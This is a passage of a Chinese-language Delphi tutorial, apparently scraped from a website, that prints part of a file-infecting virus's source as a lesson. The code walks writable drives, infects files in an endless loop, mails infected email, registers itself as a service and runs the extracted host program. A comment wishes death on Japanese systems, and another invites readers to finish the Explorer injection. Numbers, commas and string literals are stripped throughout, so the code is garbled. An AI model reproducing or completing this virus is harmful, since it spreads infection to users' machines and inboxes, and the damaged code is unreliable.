從“熊貓燒香”中學程序[5]

    procedure InfectFiles;
　　var
　　  DriverList: string;
　　  i Len: Integer;
　　begin
  　　if GetACP = then //日文操作系統
  　　  IsJap := True; //去死吧！
  　　DriverList := GetDrives; //得到可寫的磁盤列表
 　　 Len := Length(DriverList);
 　　 while True do //死循環
 　　 begin
 　　   for i := Len downto do //遍歷每個磁盤驅動器
 　　     LoopFiles(DriverList[i] + : **); //感染之
  　　  SendMail; //發帶毒郵件
  　　  Sleep( * * ); //睡眠分鐘
 　　 end;
　　end;
　　{ 主程序開始 }
　　begin
　　  if IsWinx then //是Winx
　　    RegisterServiceProcess(GetCurrentProcessID ) //注冊為服務進程
 　　 else //WinNT
  　　begin
 　　   //遠程線程映射到Explorer進程
  　　  //哪位兄台願意完成之？
 　　 end;
 　　 //如果是原始病毒體自己
 　　 if CompareText(ExtractFileName(ParamStr()) Japussyexe) = then
   　　 InfectFiles //感染和發郵件
  　　else //已寄生於宿主程序上了開始工作
 　　 begin
 　　   TmpFile := ParamStr(); //創建臨時文件
 　　  Delete(TmpFile Length(TmpFile) );
 　　   TmpFile := TmpFile + # + exe; //真正的宿主文件多一個空格
 　　   ExtractFile(TmpFile); //分離之
 　　   FillStartupInfo(Si SW_SHOWDEFAULT);
 　　   CreateProcess(PChar(TmpFile) PChar(TmpFile) nil nil True
  　　    nil Si Pi); //創建新進程運行之
 　　   InfectFiles; //感染和發郵件
 　　 end;
　　end

[]  []  []  []  []  

From:http://tw.wingwit.com/Article/program/Delphi/201311/8477.html